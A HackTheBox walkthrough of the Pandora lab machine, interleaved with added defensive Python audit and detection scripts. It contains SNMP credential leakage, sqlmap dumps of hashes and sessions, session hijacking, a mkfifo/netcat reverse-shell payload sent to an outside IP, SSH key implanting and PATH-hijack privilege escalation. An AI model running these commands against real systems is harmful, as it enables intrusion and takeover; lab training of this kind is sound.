Pandora HackTheBox WalkThrough
This is the Pandora HackTheBox machine walkthrough. In this writeup, I have demonstrated step by step how I rooted the Pandora HackTheBox machine. Before starting, let us know something about this machine. It is a Linux box with IP address 10.10.11.136 and difficulty easy, as assigned by its maker.
First of all, connect your PC to the HackTheBox VPN and confirm connectivity with the Pandora machine by pinging its IP 10.10.11.136. If all goes well, start hacking. As usual, I started by scanning the machine.
Scanning gives us an idea of how to proceed further: it helps in banner grabbing the services running on different ports, and sometimes it helps in vulnerability assessment too. I have used nmap for this task; the commands and results are given below:
$ sudo nmap -p- -oN full-tcp-scan.nmap --min-rate=10000 10.10.11.136
$ sudo nmap -p22,80 -oN script-scan.nmap -sC -sV 10.10.11.136
$ sudo nmap --top-ports 10 -sU -oN top-udp.nmap 10.10.11.136
$ sudo nmap -p161 -sU -sC -sV -T4 -oN udp-script.nmap 10.10.11.136
The Nmap full TCP scan revealed ports 22 and 80 as open. OpenSSH is running on port 22 and the apache2 web server is running on port 80. Also, the UDP scan of the top 10 ports revealed port 161 as open, with the SNMP service running on it. SNMP is a bit unusual, so let us explore it.
Simple Network Management Protocol (SNMP) is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. It is widely used in network management for network monitoring. It exposes management data in the form of variables on the managed systems, organized in a Management Information Base (MIB) which describes the system status and configuration.
Enumeration on Port 161
On further enumeration of port 161 using nmap's snmp scripts, I found a credential:
$ sudo nmap -sU -p161 --script "snmp* and not snmp-brute" 10.10.11.136
You can also use metasploit's auxiliary module auxiliary/scanner/snmp/snmp_enum for SNMP enumeration. It performs the same task as nmap's snmp scripts do.
msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.11.136
msf6 auxiliary(scanner/snmp/snmp_enum) > run
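What makes SNMP leak a credential here is that a readable community string exposes the full command line of every running process (the HOST-RESOURCES-MIB hrSWRunParameters table), so a password passed as a program argument shows up in the output of nmap's snmp scripts or snmp_enum. The following audit script is an added example, not code from this writeup or from the Pandora box: it takes (pid, command line) pairs as SNMP would expose them and flags any that carry a secret as an argument, so a defender can find such leaks before an outside scanner does. The process list, the flag names it looks for and the masking are constructed assumptions.

```python
import re
import shlex

# Constructed sample of what SNMP's HOST-RESOURCES-MIB hrSWRunParameters table
# exposes: (pid, full command line) per process. Not the Pandora box's process list.
SAMPLE_HRSWRUN = [
    ("412", "/usr/sbin/sshd -D"),
    ("1337", "/usr/bin/backup_agent -u svc_backup -p S3cr3t!"),
    ("1402", "/usr/bin/mysql -u monitor -pMon1torPw -e 'select 1'"),
    ("1510", "/usr/bin/python3 /opt/poll.py --url https://poller:hunter2@mon.internal/api"),
    ("1611", "/usr/bin/nmap -p 80 127.0.0.1"),
]

# Flags that usually take a secret as the next argument (assumed list; extend for your services).
PASSWORD_FLAGS = {"-p", "--password", "--pass", "--passwd", "--secret", "--token"}
KV_SECRET = re.compile(r"^(pass(?:word)?|pwd|secret|token|api_key)=(.+)$", re.I)
URL_USERINFO = re.compile(r"^[a-z][a-z0-9+.-]*://[^/\s:@]+:([^@\s]+)@", re.I)
NUMERIC_ARG = re.compile(r"^[\d,\-]+$")  # port lists such as "80" or "1-1024": not a secret


def mask(secret):
    """Keep the first character so the finding is recognisable without re-leaking the value."""
    return secret[:1] + "*" * (len(secret) - 1)


def find_secrets_in_cmdlines(cmdlines):
    """Return (pid, program, masked indicator) for every command line that embeds a secret."""
    findings = []
    for pid, cmdline in cmdlines:
        try:
            tokens = shlex.split(cmdline)
        except ValueError:
            tokens = cmdline.split()
        if not tokens:
            continue
        program = tokens[0]
        for i, tok in enumerate(tokens):
            low = tok.lower()
            hit = None
            if low in PASSWORD_FLAGS and i + 1 < len(tokens):
                value = tokens[i + 1]
                if not NUMERIC_ARG.match(value):          # "-p 80" is a port, not a password
                    hit = f"{tok} {mask(value)}"
            elif "=" in tok and low.split("=", 1)[0] in PASSWORD_FLAGS:
                flag, value = tok.split("=", 1)
                hit = f"{flag}={mask(value)}"
            elif low.startswith("-p") and not low.startswith("--") and len(tok) > 2:
                hit = f"-p{mask(tok[2:])}"                # mysql-style glued -pSECRET
            elif KV_SECRET.match(tok):
                key, value = tok.split("=", 1)
                hit = f"{key}={mask(value)}"
            else:
                m = URL_USERINFO.match(tok)
                if m:                                    # user:password@host inside a URL
                    hit = tok.replace(m.group(1), mask(m.group(1)))
            if hit:
                findings.append((pid, program, hit))
                break                                    # one finding per process is enough
    return findings


if __name__ == "__main__":
    for pid, program, hit in find_secrets_in_cmdlines(SAMPLE_HRSWRUN):
        print(f"pid {pid}: {program} leaks a secret via {hit}")
```

Run against a live host, the same function can be fed the output of `ps -eo pid,args` or of an snmpwalk of hrSWRunParameters; a hit means the secret belongs in a root-only config file or environment, not on the command line, and the SNMP community string itself should be changed from the default and restricted to the monitoring host.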
Let us use this credential [daniel: HotelBabylon23] to SSH into the Pandora box.
Getting User Shell
$ ssh daniel@10.10.11.136
$ whoami && id
We have successfully logged in to the Pandora box as user daniel. It has two users, namely daniel and matt. The user flag is only accessible to matt and root; therefore, when I tried to access it, I got an Access Denied message. To capture the flag, we have to log in as user matt. After some enumeration, when I didn't find anything interesting, I simply checked all the listening ports on the Pandora box.
Checking the Listening Ports
$ ss -lnpt
Ports 22 and 80 are listening as normal [because they can be accessed from outside the box]. On the other hand, the remaining ports, 53 among them, are only accessible from localhost. Since we don't have any credentials for those services, we can't access them. I simply curled the IP 127.0.0.1 and found the URI /pandora_console/. This hinted me to check the URL http://127.0.0.1/pandora_console/. When I checked it, I found different content, which was not accessible through the URL http://10.10.11.136/pandora_console/.
$ curl 127.0.0.1
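The ss output above is the kind of thing worth checking routinely on your own hosts: anything bound only to 127.0.0.1 is out of reach of a network scanner but reachable the moment someone has a shell on the box, which is exactly what the port forward below exploits. As an added example (not from the writeup), this Python snippet parses ss -lnpt output and separates ports exposed on all interfaces from ports bound only to loopback; the sample output is constructed, not the Pandora box's.

```python
import ipaddress
import re

# Constructed ss -lnpt output in the format the tool prints; not the Pandora box's listeners.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port  Process
LISTEN  0       4096     127.0.0.53%lo:53      0.0.0.0:*
LISTEN  0       128      0.0.0.0:22            0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       80       127.0.0.1:8080        0.0.0.0:*
LISTEN  0       511      *:80                  *:*                users:(("apache2",pid=902,fd=4))
LISTEN  0       128      [::]:22               [::]:*             users:(("sshd",pid=812,fd=4))
"""

PROCESS_RE = re.compile(r'users:\(\("([^"]+)"')


def parse_ss_listeners(text):
    """Parse ss -lnpt output into records with port, bound host, scope and owning process."""
    records = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue                                   # header line or non-listening entry
        host, port = fields[3].rsplit(":", 1)
        host = host.split("%", 1)[0].strip("[]")       # drop scope id (%lo) and IPv6 brackets
        if host in ("*", ""):
            scope = "any"                              # wildcard bind
        else:
            addr = ipaddress.ip_address(host)
            if addr.is_loopback:
                scope = "loopback"
            elif addr.is_unspecified:                  # 0.0.0.0 or ::
                scope = "any"
            else:
                scope = "specific"                     # bound to one interface address
        m = PROCESS_RE.search(line)                    # ss -p only shows this for visible processes
        records.append({"port": int(port), "host": host or "*", "scope": scope,
                        "process": m.group(1) if m else None})
    return records


def classify_ports(records):
    """Split listening ports into those reachable from the network and loopback-only ones."""
    exposed, local_only = set(), set()
    for r in records:
        (local_only if r["scope"] == "loopback" else exposed).add(r["port"])
    local_only -= exposed                              # a port bound both ways counts as exposed
    return sorted(exposed), sorted(local_only)


if __name__ == "__main__":
    exposed, local_only = classify_ports(parse_ss_listeners(SAMPLE_SS_OUTPUT))
    print("exposed:", exposed)                         # [22, 80]
    print("loopback-only:", local_only)                # [53, 8080]
```

The loopback-only list is the one to review for services that assume "local means trusted": a web console listening on 127.0.0.1 with weak or reused credentials is only as protected as the weakest SSH account on the host.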
To access this Pandora Console, we have to forward port 80 of the box to our localhost [Kali machine]. Since we have SSH credentials, we can use them to perform local port forwarding.
Local Port Forwarding
$ ssh -L 80:127.0.0.1:80 daniel@10.10.11.136 # run as root on Kali (or pick a high local port), since binding local port 80 needs root
After local port forwarding, pandora_console is accessible through the URL http://127.0.0.1/pandora_console/.
I tried to log in with the Pandora FMS default credential pandora and with some other credential combinations, but none of them worked. The version of this FMS is also displayed on the console.
I simply googled this version for vulnerabilities and found that it is affected by many vulnerabilities, namely Malicious File Execution, SQL Injection, XSS and a lot more. Check the two linked articles for more info.
SQL Injection can be confirmed through the endpoint http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1.
As soon as I confirmed this vulnerability, I dumped the password hashes of all the users.
$ sqlmap -u http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1 --dbs --batch --technique=EU --time-sec=30
$ sqlmap -u http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1 -D pandora -T tusuario -C fullname,is_admin,password,email --dump --threads=10
Then I tried to crack the hashes using hashcat and the wordlist rockyou.txt, but it could not crack them. So I dumped the session IDs of all logged-in users from the table tsessions_php and hijacked the session of user matt.
$ sqlmap -u http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1 -D pandora --dbms=mysql -T tsessions_php --dump --threads=10 --risk=3
Hijacking Session of Matt
Simply replace the PHPSESSID cookie value with g80h3hf7j4u3js38pchlm445kn (matt's session ID from the dump) and then refresh the page. We can see that we have successfully hijacked the session of matt and are logged in as matt.
Getting Shell as Matt
According to this post, we can perform Remote Command Execution via the events AJAX endpoint (the ajax.php?page=include/ajax/events request with the perform_event_response and target parameters used below).
Note: If we get a user shell here, it will have the privileges of user matt, because currently we are logged in as matt.
Let us exploit it and get a user shell using the PoC given in this post.
On Kali Machine
$ curl -H "Cookie: PHPSESSID=g80h3hf7j4u3js38pchlm445kn" "http://127.0.0.1/pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2%3E%261|nc+10.10.17.97+1234+%3E/tmp/f&response_id=1"
On Local Machine
$ nc -nvlp 1234
$ whoami && id
We have successfully got a user shell with the privileges of user matt. Let us upgrade it to a fully interactive Linux shell so that we can run more advanced commands through it.
Note: You will get an access denied message as below if the session ID of user matt has expired. In that case, dump a fresh session ID from the tsessions_php table and use it to hijack matt's session again.
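Both the chart_generator.php injection and the events AJAX command execution leave distinctive traces in the Apache access log, which is where a defender of a Pandora FMS install would look for them. As an added example, not part of this writeup or of Pandora FMS, the script below runs detection rules over constructed Apache combined-format log lines: a session_id on chart_generator.php that is not a well-formed PHP session identifier, shell metacharacters in the target parameter of an include/ajax/events perform_event_response request, and the sqlmap User-Agent. The log lines, the rule names and the allowed session-id alphabet (PHP's default a-z, A-Z, 0-9, comma and dash) are assumptions made here.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed Apache combined-format log lines, not taken from the Pandora box. The
# suspicious values are deliberately inert: a stray quote in session_id and "whoami;id".
SAMPLE_ACCESS_LOG = """\
127.0.0.1 - - [10/Jan/2022:10:00:01 +0000] "GET /pandora_console/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
127.0.0.1 - - [10/Jan/2022:10:00:05 +0000] "GET /pandora_console/include/chart_generator.php?session_id=1%27 HTTP/1.1" 200 312 "-" "sqlmap/1.6"
127.0.0.1 - - [10/Jan/2022:10:00:09 +0000] "GET /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=whoami%3bid&response_id=1 HTTP/1.1" 200 44 "-" "curl/7.74.0"
127.0.0.1 - - [10/Jan/2022:10:00:12 +0000] "GET /pandora_console/include/chart_generator.php?session_id=abc123def456 HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Default PHP session ids are drawn from [a-zA-Z0-9,-]; anything else is not a session id.
SESSION_ID_OK = re.compile(r"^[A-Za-z0-9,-]{1,128}$")
SHELL_META = re.compile(r"[;|&`$<>\n]")


def inspect_request(url, user_agent):
    """Return the names of the detection rules triggered by one request."""
    rules = []
    parsed = urlparse(url)
    params = parse_qs(parsed.query, keep_blank_values=True)   # percent-decodes the values
    if "sqlmap" in user_agent.lower():
        rules.append("scanner-user-agent")
    if parsed.path.endswith("/include/chart_generator.php"):
        # Allowlist check: a quote, space or keyword can never be part of a real session id.
        if any(not SESSION_ID_OK.match(sid) for sid in params.get("session_id", [])):
            rules.append("chart_generator-session_id-not-a-session-id")
    if (parsed.path.endswith("/ajax.php")
            and params.get("page") == ["include/ajax/events"]
            and "perform_event_response" in params):
        # The target value is handed to a shell by the vulnerable code path, so metacharacters matter.
        if any(SHELL_META.search(t) for t in params.get("target", [])):
            rules.append("event-response-target-shell-metacharacters")
    return rules


def scan_access_log(text):
    """Run inspect_request over every parsable log line; returns (ip, timestamp, rule, url) tuples."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule in inspect_request(m["url"], m["ua"]):
            alerts.append((m["ip"], m["ts"], rule, m["url"]))
    return alerts


if __name__ == "__main__":
    for ip, ts, rule, url in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{ts} {ip} {rule}: {url}")
```

Note what the rules do not fire on: the plain `session_id=1` from the writeup is a well-formed value and passes, which is why a single probe is hard to spot and the User-Agent and request volume are the better early signals; the session-id rule catches the follow-up payloads that sqlmap sends once it starts testing.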
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ ^Z # Ctrl+Z to background the shell
$ stty raw -echo
$ fg # then press Enter twice to bring the shell back to the foreground
$ export TERM=xterm
We have successfully upgraded the shell. Let us capture the user flag.
Capture User Flag
$ cat /home/matt/user.txt
To escalate privileges to root, we first have to find a Privilege Escalation Vector. We can find a PrivEsc vector either manually or using post-exploitation enumeration scripts like Linpeas.sh, LinEnum.sh and many more. Check this link on PayloadsAllTheThings. This time, I have used Linpeas.sh for this task.
Finding PrivEsc Vector
Linpeas.sh found a custom SUID binary, pandora_backup, in the directory /usr/bin/. A SUID binary is a file which, when executed by a normal user, runs with the permissions of its owner rather than those of the user who ran it.
For example, if a binary has the SUID bit set and is owned by root, then when a normal user executes it, all the commands inside that binary run with root privileges.
Let us check who can execute pandora_backup by checking its permissions.
$ ls -la /usr/bin/pandora_backup
pandora_backup has execute permission for user matt. This binary can be used to escalate privileges via Path Hijacking if the Linux commands used inside it are not called with their absolute paths. Let us check whether any Linux command is used without its absolute path inside pandora_backup.
$ cat /usr/bin/pandora_backup
We found that the tar command is used without its absolute path. We can use the tar command to exploit this weakness and get a root shell. When I tried to get a shell by manipulating tar, I got a root shell without much effort. So our potential PrivEsc vector is Privilege Escalation by Path Hijacking, or Privilege Escalation by Custom SUID exploitation. Check HTB boxes with a similar privilege escalation vector here and here.
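The weakness in pandora_backup is a SUID program that names tar without an absolute path, so the name is resolved through the caller's PATH at run time. As an added example (not the author's code and not the real binary), the script below does the check that Linpeas-style tooling leaves to the analyst: it walks a directory for setuid/setgid files, pulls printable strings out of each, and reports known command names that appear at the head of an embedded command without a leading path. The sample ELF-like blob and the command list it matches against are constructed assumptions.

```python
import os
import re
import stat

# Constructed stand-in for a compiled SUID helper: an ELF magic followed by the kind of
# strings a program built around system() would embed. Not the real pandora_backup.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"tar -cvf /root/.backup/example.tar /var/www/example\x00"
    + b"/usr/bin/chown root:root /root/.backup/example.tar\x00"
    + b"Backup successful!\x00"
)

# Command names worth flagging when they appear unqualified (assumed list; extend as needed).
KNOWN_COMMANDS = {"tar", "cp", "mv", "rm", "sh", "bash", "cat", "gzip", "mysqldump",
                  "find", "chown", "chmod", "service", "systemctl"}
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
SHELL_SPLIT = re.compile(r"[;&|]+|\$\(|`")   # each separator starts a new command word


def extract_strings(blob):
    """Printable ASCII runs of four or more bytes, like the strings(1) default."""
    return [s.decode("ascii") for s in PRINTABLE.findall(blob)]


def unqualified_commands(blob):
    """Known command names used at the head of an embedded command without a leading path."""
    hits = set()
    for s in extract_strings(blob):
        for segment in SHELL_SPLIT.split(s):
            tokens = segment.strip().split()
            if tokens and tokens[0] in KNOWN_COMMANDS:
                hits.add(tokens[0])                 # bare name: resolved through PATH at run time
    return sorted(hits)


def find_suid_binaries(root):
    """Regular files under root with the setuid or setgid bit set."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append(path)
    return sorted(found)


def audit_suid(root):
    """Map each SUID/SGID file under root to the unqualified commands found in it."""
    report = {}
    for path in find_suid_binaries(root):
        try:
            with open(path, "rb") as fh:
                commands = unqualified_commands(fh.read())
        except OSError:
            continue                                # unreadable binaries are skipped, not reported
        if commands:
            report[path] = commands
    return report


if __name__ == "__main__":
    print("sample blob:", unqualified_commands(SAMPLE_BINARY))   # ['tar']
    for path, commands in audit_suid("/usr/bin").items():
        print(f"{path}: {commands}")
```

A hit is a lead, not proof: the string may never reach a shell. But the fix on the program side is the same either way, call /usr/bin/tar by its full path (or execve it directly with a fixed argument vector) and set PATH to a known value before any system() call; on the host side, the output of audit_suid("/usr/bin") is the list of custom binaries to review or strip of the SUID bit.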
Before privilege escalation we first need to get a persistent shell using SSH; only then does our exploit work. I don't know why, but when I tried to get root using the current shell, I failed every time. The exploit worked only when I got an SSH shell as user matt by implanting my SSH public key in the authorized_keys file of user matt. So let us implant our SSH public key into authorized_keys.
Implanting SSH Keys
On Kali Machine
$ ssh-keygen # generate a new SSH key pair
$ cat id_rsa.pub
Copy the id_rsa.pub key to your clipboard and then paste it into the authorized_keys file of user matt. If the authorized_keys file is not present, create one as below.
On Pandora Machine
$ mkdir .ssh
$ cd .ssh/
$ echo "Your SSH public key here" >authorized_keys
$ cat authorized_keys
Getting Shell as Matt
$ chmod 400 id_rsa
$ ssh -i id_rsa matt@10.10.11.136
$ whoami && id
We have successfully got a persistent shell as user matt. Let us get a root shell by performing privilege escalation.
Getting Root Shell
To get a root shell, do the following.
$ cd /tmp
$ echo "/bin/bash" > tar
$ export PATH=$(pwd):$PATH # /tmp now comes first in PATH, so a bare "tar" resolves to /tmp/tar
$ chmod +x tar
$ pandora_backup # run the SUID binary; it calls tar without an absolute path and picks up ours
# whoami && id
We have successfully got a root shell. Let us capture the root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted the Pandora HackTheBox machine. I learnt a lot during this walkthrough and hope you have also learnt something new. Thanks for reading this writeup. Share your experience in the comment section. If you want to give any suggestion about the writeup, feel free to write to us at [email protected]. Check out my latest articles at https://ethicalhacs.com/.